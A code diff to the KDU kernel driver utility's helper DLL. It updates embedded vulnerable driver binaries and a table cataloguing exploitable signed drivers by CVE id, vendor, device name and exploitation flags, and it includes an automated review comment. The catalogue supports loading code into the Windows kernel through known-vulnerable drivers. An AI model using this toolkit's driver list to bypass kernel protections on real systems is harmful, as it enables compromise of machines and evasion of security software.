diff --git a/Source/Tanikaze/drv/EneTechIo64.bin b/Source/Tanikaze/drv/EneTechIo64.bin
index f1fa3ed..c771817 100644
Binary files a/Source/Tanikaze/drv/EneTechIo64.bin and b/Source/Tanikaze/drv/EneTechIo64.bin differ
diff --git a/Source/Tanikaze/drv/GLCKIO2.bin b/Source/Tanikaze/drv/GLCKIO2.bin
index c827ed3..9a0c0a9 100644
Binary files a/Source/Tanikaze/drv/GLCKIO2.bin and b/Source/Tanikaze/drv/GLCKIO2.bin differ
diff --git a/Source/Tanikaze/drv/HW64.bin b/Source/Tanikaze/drv/HW64.bin
index ae1ec94..d14ccd3 100644
Binary files a/Source/Tanikaze/drv/HW64.bin and b/Source/Tanikaze/drv/HW64.bin differ
diff --git a/Source/Tanikaze/drv/MsIo64.bin b/Source/Tanikaze/drv/MsIo64.bin
index f6358a8..995ce14 100644
Binary files a/Source/Tanikaze/drv/MsIo64.bin and b/Source/Tanikaze/drv/MsIo64.bin differ
diff --git a/Source/Tanikaze/drv/Phymemx64.bin b/Source/Tanikaze/drv/Phymemx64.bin
index bd797dc..19fd062 100644
Binary files a/Source/Tanikaze/drv/Phymemx64.bin and b/Source/Tanikaze/drv/Phymemx64.bin differ
diff --git a/Source/Tanikaze/drv/RTCore64.bin b/Source/Tanikaze/drv/RTCore64.bin
index 7c5c57e..51417fa 100644
Binary files a/Source/Tanikaze/drv/RTCore64.bin and b/Source/Tanikaze/drv/RTCore64.bin differ
diff --git a/Source/Tanikaze/drv/SysDrv3S.bin b/Source/Tanikaze/drv/SysDrv3S.bin
index 4581fa0..d52e402 100644
Binary files a/Source/Tanikaze/drv/SysDrv3S.bin and b/Source/Tanikaze/drv/SysDrv3S.bin differ
diff --git a/Source/Tanikaze/drv/WinRing0x64.bin b/Source/Tanikaze/drv/WinRing0x64.bin
index 8d76c96..d3bdd63 100644
Binary files a/Source/Tanikaze/drv/WinRing0x64.bin and b/Source/Tanikaze/drv/WinRing0x64.bin differ
diff --git a/Source/Tanikaze/drv/amsdk.bin b/Source/Tanikaze/drv/amsdk.bin
index 03ede7b..a5e00ff 100644
Binary files a/Source/Tanikaze/drv/amsdk.bin and b/Source/Tanikaze/drv/amsdk.bin differ
diff --git a/Source/Tanikaze/drv/asio2.bin b/Source/Tanikaze/drv/asio2.bin
index fae8492..57d230b 100644
Binary files a/Source/Tanikaze/drv/asio2.bin and b/Source/Tanikaze/drv/asio2.bin differ
diff --git a/Source/Tanikaze/drv/dbk64.bin b/Source/Tanikaze/drv/dbk64.bin
index 8bbd46f..0af932f 100644
Binary files a/Source/Tanikaze/drv/dbk64.bin and b/Source/Tanikaze/drv/dbk64.bin differ
diff --git a/Source/Tanikaze/drv/dbutildrv2.bin b/Source/Tanikaze/drv/dbutildrv2.bin
index 29af1ab..d660b74 100644
Binary files a/Source/Tanikaze/drv/dbutildrv2.bin and b/Source/Tanikaze/drv/dbutildrv2.bin differ
diff --git a/Source/Tanikaze/drv/ene2.bin b/Source/Tanikaze/drv/ene2.bin
index 308ab19..9fc6d0f 100644
Binary files a/Source/Tanikaze/drv/ene2.bin and b/Source/Tanikaze/drv/ene2.bin differ
diff --git a/Source/Tanikaze/drv/gdrv.bin b/Source/Tanikaze/drv/gdrv.bin
index a26d56c..5a99c5a 100644
Binary files a/Source/Tanikaze/drv/gdrv.bin and b/Source/Tanikaze/drv/gdrv.bin differ
diff --git a/Source/Tanikaze/drv/gmerdrv.bin b/Source/Tanikaze/drv/gmerdrv.bin
index bf3934e..71019b4 100644
Binary files a/Source/Tanikaze/drv/gmerdrv.bin and b/Source/Tanikaze/drv/gmerdrv.bin differ
diff --git a/Source/Tanikaze/drv/iQVM64.bin b/Source/Tanikaze/drv/iQVM64.bin
index 599febf..bf3d7c0 100644
Binary files a/Source/Tanikaze/drv/iQVM64.bin and b/Source/Tanikaze/drv/iQVM64.bin differ
diff --git a/Source/Tanikaze/drv/inpoutx64.bin b/Source/Tanikaze/drv/inpoutx64.bin
index addb0a3..d084655 100644
Binary files a/Source/Tanikaze/drv/inpoutx64.bin and b/Source/Tanikaze/drv/inpoutx64.bin differ
diff --git a/Source/Tanikaze/drv/kprocesshacker.bin b/Source/Tanikaze/drv/kprocesshacker.bin
index 40a33b1..6c06330 100644
Binary files a/Source/Tanikaze/drv/kprocesshacker.bin and b/Source/Tanikaze/drv/kprocesshacker.bin differ
diff --git a/Source/Tanikaze/drv/lha.bin b/Source/Tanikaze/drv/lha.bin
index db479db..11ea2da 100644
Binary files a/Source/Tanikaze/drv/lha.bin and b/Source/Tanikaze/drv/lha.bin differ
diff --git a/Source/Tanikaze/drv/mimidrv.bin b/Source/Tanikaze/drv/mimidrv.bin
index 785cfbe..8c01f58 100644
Binary files a/Source/Tanikaze/drv/mimidrv.bin and b/Source/Tanikaze/drv/mimidrv.bin differ
diff --git a/Source/Tanikaze/drv/physmem.bin b/Source/Tanikaze/drv/physmem.bin
new file mode 100644
index 0000000..11736db
Binary files /dev/null and b/Source/Tanikaze/drv/physmem.bin differ
diff --git a/Source/Tanikaze/drv/procexp.bin b/Source/Tanikaze/drv/procexp1627.bin
similarity index 99%
rename from Source/Tanikaze/drv/procexp.bin
rename to Source/Tanikaze/drv/procexp1627.bin
index db55e27..e0bb1f2 100644
Binary files a/Source/Tanikaze/drv/procexp.bin and b/Source/Tanikaze/drv/procexp1627.bin differ
diff --git a/Source/Tanikaze/drv/procexp1702.bin b/Source/Tanikaze/drv/procexp1702.bin
new file mode 100644
index 0000000..ff9c69e
Binary files /dev/null and b/Source/Tanikaze/drv/procexp1702.bin differ
diff --git a/Source/Tanikaze/drv/rtkio64.bin b/Source/Tanikaze/drv/rtkio64.bin
index a8369a8..abc1b5d 100644
Binary files a/Source/Tanikaze/drv/rtkio64.bin and b/Source/Tanikaze/drv/rtkio64.bin differ
diff --git a/Source/Tanikaze/resource.h b/Source/Tanikaze/resource.h
index b5326d0..5722353 100644
--- a/Source/Tanikaze/resource.h
+++ b/Source/Tanikaze/resource.h
@@ -2,7 +2,6 @@
// Microsoft Visual C++ generated include file.
// Used by resource.rc
//
-#define IDR_PROCEXP 100
#define IDR_INTEL_NAL 103
#define IDR_RTCORE64 105
#define IDR_GDRV 106
@@ -33,19 +32,22 @@
#define IDR_ASROCKDRV 131
#define IDR_ALSYSIO64 132
#define IDR_AMD_RYZENMASTER 133
+#define IDR_PHYSMEM 134
#define IDR_DATA_DBUTILCAT 1000
#define IDR_DATA_DBUTILINF 1001
#define IDR_DATA_KMUEXE 1002
#define IDR_DATA_KMUSIG 1003
#define IDR_DATA_ASUSCERTSERVICE 1004
+#define IDR_PROCEXP1627 2000
+#define IDR_PROCEXP1702 2001
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
-#define _APS_NEXT_RESOURCE_VALUE 134
+#define _APS_NEXT_RESOURCE_VALUE 140
#define _APS_NEXT_COMMAND_VALUE 40001
-#define _APS_NEXT_CONTROL_VALUE 1001
+#define _APS_NEXT_CONTROL_VALUE 1007
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index 1ec58d6..3c8ba8a 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -52,7 +52,7 @@ END
IDR_INTEL_NAL RCDATA "drv\\iQVM64.bin"
-IDR_PROCEXP RCDATA "drv\\procexp.bin"
+IDR_PROCEXP1627 RCDATA "drv\\procexp1627.bin"
IDR_RTCORE64 RCDATA "drv\\RTCore64.bin"
@@ -122,6 +122,10 @@ IDR_ALSYSIO64 RCDATA "drv\\ALSysIO64.bin"
IDR_AMD_RYZENMASTER RCDATA "drv\\AMDRyzenMasterDriver.bin"
+IDR_PHYSMEM RCDATA "drv\\physmem.bin"
+
+IDR_PROCEXP1702 RCDATA "drv\\procexp1702.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -129,8 +133,8 @@ IDR_AMD_RYZENMASTER RCDATA "drv\\AMDRyzenMasterDriver.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,1,2212
- PRODUCTVERSION 1,1,1,2212
+ FILEVERSION 1,1,2,2303
+ PRODUCTVERSION 1,1,2,2303
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -147,12 +151,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.1.2212"
+ VALUE "FileVersion", "1.1.2.2303"
VALUE "InternalName", "Tanikaze.dll"
- VALUE "LegalCopyright", "Copyright (C) 2020 - 2022 KDU Project"
+ VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.1.2212"
+ VALUE "ProductVersion", "1.1.2.2303"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 7f5f9fc..4286444 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -1,12 +1,12 @@
/*******************************************************************************
*
-* (C) COPYRIGHT AUTHORS, 2020 - 2022
+* (C) COPYRIGHT AUTHORS, 2020 - 2023
*
* TITLE: CONSTS.H
*
-* VERSION: 1.11
+* VERSION: 1.12
*
-* DATE: 02 Dec 2022
+* DATE: 20 Mar 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -30,8 +30,9 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_INTEL_NAL,
KDU_PROVIDER_INTEL_NAL,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
- KDUPROV_FLAGS_NONE,
+ KDUPROV_FLAGS_PREFER_PHYSICAL,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2015-2291",
(LPWSTR)L"NalDrv",
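Review bot: Every `gProvEntry` initializer is positional, so inserting `VictimId` before `DrvSourceBase` required touching all thirty-odd entries (this hunk through L4065), and a future entry that omits the field would still compile with every later field shifted by one slot. If this translation unit is built as C99 or C++20, designated initializers (`.VictimId = KDU_VICTIM_DEFAULT, .DrvSourceBase = SourceBaseNone,`) would make the table robust to further field additions; otherwise at least add a comment above the table listing the field order. Entries flagged `KDUPROV_FLAGS_NO_VICTIM` (the PROCEXP entry at L3874-3876 and the DBK64 entry at L3905-3907) still carry a `VictimId`; a short comment saying whether the id is ignored for such entries would remove the ambiguity.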
@@ -44,6 +45,7 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_RTCORE64,
KDU_PROVIDER_UNWINDER_RTCORE,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NONE,
KDUPROV_SC_ALL_DEFAULT,
@@ -58,13 +60,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_GDRV,
KDU_PROVIDER_GIGABYTE_GDRV,
+ KDU_VICTIM_DEFAULT,
SourceBaseMapMem,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2018-19320",
(LPWSTR)L"Gdrv",
(LPWSTR)L"GIO",
- (LPWSTR)L"Giga-Byte Technology",
+ (LPWSTR)L"Giga-Byte Technology"
},
{
@@ -72,13 +75,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ATSZIO64,
KDU_PROVIDER_ASUSTEK_ATSZIO,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASUSTeK WinFlash",
(LPWSTR)L"ATSZIO",
(LPWSTR)L"ATSZIO",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -86,13 +90,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_MSIO64,
KDU_PROVIDER_PATRIOT_MSIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2019-18845",
(LPWSTR)L"MsIo64",
(LPWSTR)L"MsIo",
- (LPWSTR)L"MICSYS Technology Co., Ltd.",
+ (LPWSTR)L"MICSYS Technology Co., Ltd."
},
{
@@ -100,13 +105,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_GLCKIO2,
KDU_PROVIDER_GLCKIO2,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASRock Polychrome RGB, multiple CVE ids",
(LPWSTR)L"GLCKIo2",
(LPWSTR)L"GLCKIo2",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -114,13 +120,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ENEIO64,
KDU_PROVIDER_ENEIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"G.SKILL Trident Z Lighting Control",
(LPWSTR)L"EneIo64",
(LPWSTR)L"EneIo",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -128,13 +135,14 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_REDSTONE3,
IDR_WINRING0,
KDU_PROVIDER_WINRING0,
+ KDU_VICTIM_PE1627,
SourceBaseWinRing0,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"EVGA Precision X1",
(LPWSTR)L"WinRing0x64",
(LPWSTR)L"WinRing0_1_2_0",
- (LPWSTR)L"EVGA",
+ (LPWSTR)L"EVGA"
},
{
@@ -142,13 +150,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ENETECHIO64,
KDU_PROVIDER_ENETECHIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Thermaltake TOUGHRAM Software",
(LPWSTR)L"EneTechIo64",
(LPWSTR)L"EneTechIo",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -156,13 +165,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_PHYMEMX64,
KDU_PROVIDER_PHYMEM64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Huawei MateBook Manager",
(LPWSTR)L"phymemx64",
(LPWSTR)L"PhyMem",
- (LPWSTR)L"Huawei Technologies Co.,Ltd.",
+ (LPWSTR)L"Huawei Technologies Co.,Ltd."
},
{
@@ -170,13 +180,14 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_REDSTONE3,
IDR_RTKIO64,
KDU_PROVIDER_RTKIO64,
+ KDU_VICTIM_DEFAULT,
SourceBasePhyMem,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Realtek Dash Client Utility",
(LPWSTR)L"rtkio64",
(LPWSTR)L"rtkio",
- (LPWSTR)L"Realtek Semiconductor Corp.",
+ (LPWSTR)L"Realtek Semiconductor Corp."
},
{
@@ -184,13 +195,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ENETECHIO64B,
KDU_PROVIDER_ENETECHIO64B,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"MSI Dragon Center",
(LPWSTR)L"EneTechIo64",
(LPWSTR)L"EneTechIo",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -198,13 +210,14 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_REDSTONE3,
IDR_LHA,
KDU_PROVIDER_LHA,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2019-8372",
(LPWSTR)L"lha",
(LPWSTR)L"{E8F2FF20-6AF7-4914-9398-CE2132FE170F}",
- (LPWSTR)L"LG Electronics Inc.",
+ (LPWSTR)L"LG Electronics Inc."
},
{
@@ -212,13 +225,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ASUSIO2,
KDU_PROVIDER_ASUSIO2,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASUS GPU Tweak",
(LPWSTR)L"AsIO2",
(LPWSTR)L"Asusgio2",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -226,13 +240,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DIRECTIO64,
KDU_PROVIDER_DIRECTIO64,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"PassMark DirectIO",
(LPWSTR)L"DirectIo64",
(LPWSTR)L"DIRECTIO64",
- (LPWSTR)L"PassMark Software Pty Ltd",
+ (LPWSTR)L"PassMark Software Pty Ltd"
},
{
@@ -240,13 +255,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_GMERDRV,
KDU_PROVIDER_GMER,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NO_FORCED_SD,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Gmer 'Antirootkit'",
(LPWSTR)L"gmerdrv",
(LPWSTR)L"gmerdrv",
- (LPWSTR)L"GMEREK Systemy Komputerowe Przemyslaw Gmerek",
+ (LPWSTR)L"GMEREK Systemy Komputerowe Przemyslaw Gmerek"
},
{
@@ -254,13 +270,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DBUTIL23,
KDU_PROVIDER_DBUTIL23,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NO_UNLOAD_SUP,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2021-21551",
(LPWSTR)L"DBUtil23",
(LPWSTR)L"DBUtil_2_3",
- (LPWSTR)L"Dell Inc.",
+ (LPWSTR)L"Dell Inc."
},
{
@@ -268,13 +285,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_MIMIDRV,
KDU_PROVIDER_MIMIDRV,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NONE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Mimikatz mimidrv",
(LPWSTR)L"mimidrv",
(LPWSTR)L"mimidrv",
- (LPWSTR)L"Benjamin Delpy",
+ (LPWSTR)L"Benjamin Delpy"
},
{
@@ -282,27 +300,29 @@ KDU_DB_ENTRY gProvEntry[] = {
NT_WIN10_21H2,
IDR_KPH,
KDU_PROVIDER_KPH,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"KProcessHacker",
(LPWSTR)L"KProcessHacker",
(LPWSTR)L"KProcessHacker2",
- (LPWSTR)L"Wen Jia Liu",
+ (LPWSTR)L"Wen Jia Liu"
},
{
KDU_MIN_NTBUILDNUMBER,
NT_WIN10_21H2,
- IDR_PROCEXP,
+ IDR_PROCEXP1627,
KDU_PROVIDER_PROCEXP,
+ KDU_VICTIM_PE1627,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_VICTIM,
KDUPROV_SC_ALL_DEFAULT,
- (LPWSTR)PROCEXP_DESC,
+ (LPWSTR)PROCEXP1627_DESC,
(LPWSTR)PROCEXP152,
(LPWSTR)PROCEXP152,
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -310,13 +330,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DBUTILDRV2,
KDU_PROVIDER_DBUTILDRV2,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CVE-2021-36276",
(LPWSTR)L"DBUtilDrv2",
(LPWSTR)L"DBUtil_2_5",
- (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher",
+ (LPWSTR)L"Microsoft Windows Hardware Compatibility Publisher"
},
{
@@ -324,13 +345,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_DBK64,
KDU_PROVIDER_DBK64,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_NO_VICTIM,
KDUPROV_SC_V4,
(LPWSTR)L"Cheat Engine Dbk64",
(LPWSTR)L"CEDRIVER73",
(LPWSTR)L"CEDRIVER73",
- (LPWSTR)L"Cheat Engine",
+ (LPWSTR)L"Cheat Engine"
},
{
@@ -338,13 +360,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ASUSIO3,
KDU_PROVIDER_ASUSIO3,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASUS GPU Tweak II",
(LPWSTR)L"AsIO3",
(LPWSTR)L"Asusgio3",
- (LPWSTR)L"ASUSTeK Computer Inc.",
+ (LPWSTR)L"ASUSTeK Computer Inc."
},
{
@@ -352,13 +375,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_HW64,
KDU_PROVIDER_HW64,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Marvin Hardware Access Driver for Windows",
(LPWSTR)L"hw64",
(LPWSTR)L"hw",
- (LPWSTR)L"Marvin Test Solutions, Inc.",
+ (LPWSTR)L"Marvin Test Solutions, Inc."
},
{
@@ -366,13 +390,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_SYSDRV3S,
KDU_PROVIDER_SYSDRV3S,
+ KDU_VICTIM_DEFAULT,
SourceBaseMapMem,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_NO_UNLOAD_SUP,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"CODESYS SysDrv3S (CVE-2022-22516)",
(LPWSTR)L"SysDrv3S",
(LPWSTR)L"SysDrv3S",
- (LPWSTR)L"3S-Smart Software Solutions GmbH.",
+ (LPWSTR)L"3S-Smart Software Solutions GmbH."
},
{
@@ -380,13 +405,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ZEMANA,
KDU_PROVIDER_ZEMANA,
+ KDU_VICTIM_PE1702,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL,
KDUPROV_SC_V4,
(LPWSTR)L"Zemana (CVE-2021-31728, CVE-2022-42045)",
(LPWSTR)L"ZemanaAntimalware",
(LPWSTR)L"amsdk",
- (LPWSTR)L"WATCHDOGDEVELOPMENT.COM, LLC",
+ (LPWSTR)L"WATCHDOGDEVELOPMENT.COM, LLC"
},
{
@@ -394,13 +420,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_INPOUTX64,
KDU_PROVIDER_INPOUTX64,
+ KDU_VICTIM_DEFAULT,
SourceBaseWinIo,
KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"inpoutx64 Driver Version 1.2",
(LPWSTR)L"inpoutx64",
(LPWSTR)L"inpoutx64",
- (LPWSTR)L"Red Fox UK Limited",
+ (LPWSTR)L"Red Fox UK Limited"
},
{
@@ -408,13 +435,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_PASSMARK_OSF,
KDU_PROVIDER_PASSMARK_OSF,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PML4_FROM_LOWSTUB,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"PassMark OSForensics DirectIO",
(LPWSTR)L"DirectIo64",
(LPWSTR)L"DIRECTIO64",
- (LPWSTR)L"PassMark Software Pty Ltd",
+ (LPWSTR)L"PassMark Software Pty Ltd"
},
{
@@ -422,13 +450,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ASROCKDRV,
KDU_PROVIDER_ASROCK,
+ KDU_VICTIM_DEFAULT,
SourceBaseRWEverything,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"ASRock IO Driver",
(LPWSTR)L"AsrDrv106",
(LPWSTR)L"AsrDrv106",
- (LPWSTR)L"ASROCK Incorporation",
+ (LPWSTR)L"ASROCK Incorporation"
},
{
@@ -436,13 +465,14 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_ALSYSIO64,
KDU_PROVIDER_ALCPU,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"Core Temp",
(LPWSTR)L"ALSysIO64",
(LPWSTR)L"ALSysIO",
- (LPWSTR)L"ALCPU (Arthur Liberman)",
+ (LPWSTR)L"ALCPU (Arthur Liberman)"
},
{
@@ -450,13 +480,29 @@ KDU_DB_ENTRY gProvEntry[] = {
KDU_MAX_NTBUILDNUMBER,
IDR_AMD_RYZENMASTER,
KDU_PROVIDER_AMD_RYZENMASTER,
+ KDU_VICTIM_DEFAULT,
SourceBaseNone,
KDUPROV_FLAGS_SIGNATURE_WHQL | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
KDUPROV_SC_ALL_DEFAULT,
(LPWSTR)L"AMD Ryzen Master Service Driver",
(LPWSTR)L"AMDRyzenMasterDriver",
(LPWSTR)L"AMDRyzenMasterDriverV20",
- (LPWSTR)L"Advanced Micro Devices Inc.",
+ (LPWSTR)L"Advanced Micro Devices Inc."
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ KDU_MAX_NTBUILDNUMBER,
+ IDR_PHYSMEM,
+ KDU_PROVIDER_HR_PHYSMEM,
+ KDU_VICTIM_DEFAULT,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PHYSICAL_BRUTE_FORCE,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Physical Memory Access Driver",
+ (LPWSTR)L"physmem",
+ (LPWSTR)L"PHYSMEMVIEWER",
+ (LPWSTR)L"Hilscher Gesellschaft fuer Systemautomation mbH"
}
};